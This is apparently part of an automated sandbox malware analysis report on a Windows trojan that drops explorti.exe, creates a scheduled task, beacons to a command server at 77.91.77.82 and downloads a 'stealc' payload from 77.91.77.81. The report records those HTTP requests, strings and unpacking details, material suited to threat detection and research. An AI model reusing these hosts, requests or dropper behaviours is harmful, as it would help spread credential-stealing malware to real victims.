Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 77.91.77.81 77.91.77.81
Source: Joe Sandbox View IP Address: 77.91.77.82 77.91.77.82
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_0016BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 11_2_0016BD30
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: unknown HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/?h
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe0673b5d7q
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe1000006001
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe50673b5d76
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe50673b5ddG
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exeM
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exeS
Source: explorti.exe, 0000000B.00000003.3440649233.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000B.00000002.3747242277.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php9Z
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php?
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpJ
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpT
Source: explorti.exe, 0000000B.00000003.3441848622.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000B.00000003.3440649233.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phprb
Source: explorti.exe, 0000000B.00000002.3747242277.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phps
Source: random[1].exe.11.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: random[1].exe.11.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: random[1].exe.11.dr String found in binary or memory: http://pki-ocsp.symauth.com0

System Summary
barindex
PE file contains section with special chars
Source: 8vZMEr8sm9.exe Static PE information: section name:
Source: 8vZMEr8sm9.exe Static PE information: section name: .idata
Source: 8vZMEr8sm9.exe Static PE information: section name:
Source: explorti.exe.4.dr Static PE information: section name:
Source: explorti.exe.4.dr Static PE information: section name: .idata
Source: explorti.exe.4.dr Static PE information: section name:
PE file has nameless sections
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_0016E410 11_2_0016E410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_001A3048 11_2_001A3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00164CD0 11_2_00164CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00197D63 11_2_00197D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_001A763B 11_2_001A763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00164AD0 11_2_00164AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_001A6EE9 11_2_001A6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_001A8700 11_2_001A8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_001A775B 11_2_001A775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_001A2BB0 11_2_001A2BB0
Uses 32bit PE files
Source: 8vZMEr8sm9.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8vZMEr8sm9.exe Static PE information: Section: ZLIB complexity 0.9983136953551912
Source: 8vZMEr8sm9.exe Static PE information: Section: xdymjpys ZLIB complexity 0.9945768880591525
Source: explorti.exe.4.dr Static PE information: Section: ZLIB complexity 0.9983136953551912
Source: explorti.exe.4.dr Static PE information: Section: xdymjpys ZLIB complexity 0.9945768880591525
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.9996665396341463
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.9935302734375
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.98974609375
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/4@0/2
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe File created: C:\Users\user~1\AppData\Local\Temp\ad40971b6b Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 8vZMEr8sm9.exe ReversingLabs: Detection: 42%
Source: 8vZMEr8sm9.exe Virustotal: Detection: 41%
Source: 8vZMEr8sm9.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe File read: C:\Users\user\Desktop\8vZMEr8sm9.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\8vZMEr8sm9.exe "C:\Users\user\Desktop\8vZMEr8sm9.exe"
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: 8vZMEr8sm9.exe Static file information: File size 1942528 > 1048576
Source: 8vZMEr8sm9.exe Static PE information: Raw size of xdymjpys is bigger than: 0x100000 < 0x1a8c00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Unpacked PE file: 4.2.8vZMEr8sm9.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xdymjpys:EW;poxsfwvj:EW;.taggant:EW;
